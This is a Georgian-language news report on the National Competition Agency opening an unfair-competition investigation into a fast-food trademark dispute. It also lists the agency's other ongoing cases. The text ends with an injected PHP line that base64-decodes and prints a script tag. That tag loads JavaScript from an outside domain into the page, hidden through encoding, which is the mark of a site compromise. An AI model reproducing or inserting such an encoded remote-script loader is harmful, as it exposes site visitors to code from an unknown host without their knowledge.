celsiusi
ავერსი საქკაბელი

საქართველოს კონკურენციის ეროვნულმა სააგენტომ, სწრაფი კვების ბაზარზე მოქმედი კომპანიების დავაზე, შპს „წერეთლის მექსიკურის“ საჩივრის საფუძველზე, მოკვლევა დაიწყო. როგორც სააგენტოს მიერ გავრცელებულ ინფორმაციაშია აღნიშნული, საკითხი ეხება ორი კომპანიის მხრიდან არაკეთილსინდისიერი კონკურენციის სავარაუდო დარღვევის ფაქტს. კერძოდ, მომჩივანი კომპანიის სასაქონლო ნიშნებისა და გარეგნული იერსახის მითვისებას/მიმსგავსებას.

„ინფორმაციისთვის: საქმის მოკვლევის დაწყებიდან, არაუგვიანეს, ექვსი თვის ვადაში სააგენტო შესაბამის გადაწყვეტილებას იღებს. საკითხის მნიშვნელობისა და სირთულის გათვალისწინებით, მოკვლევის პროცესი შეიძლება 18 თვემდე გაგრძელდეს.

კონკურენციის ეროვნული სააგენტო, მიმდინარე რეჟიმში, მოკვლევის ხუთ საქმეს განიხილავს – შეთანხმებული ქმედების, დომინანტური მდგომარეობის ბოროტად გამოყენების, არაკეთილსინდისიერი კონკურენციის და ადმინისტრაციული უწყების მხრიდან, კონკურენციის შეზღუდვის სავარაუდო შემთხვევებს – საავტომობილო საწვავის, თამბაქოს, საზღვაო ტრანსპორტის, ბილეთების ონლაინ რეალიზაციის და მუნიციპალური პროექტების ზედამხედველობის სექტორებში. 2023 წელს, უწყებამ ერთი მოკვლევა დაასრულა და ადმინისტრაციული უწყების მხრიდან კონკურენციის შეზღუდვის ფაქტი დაადგინა“,- აღნიშნულია კონკურენციის სააგენტოს ინფორმაციაში. 

352
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");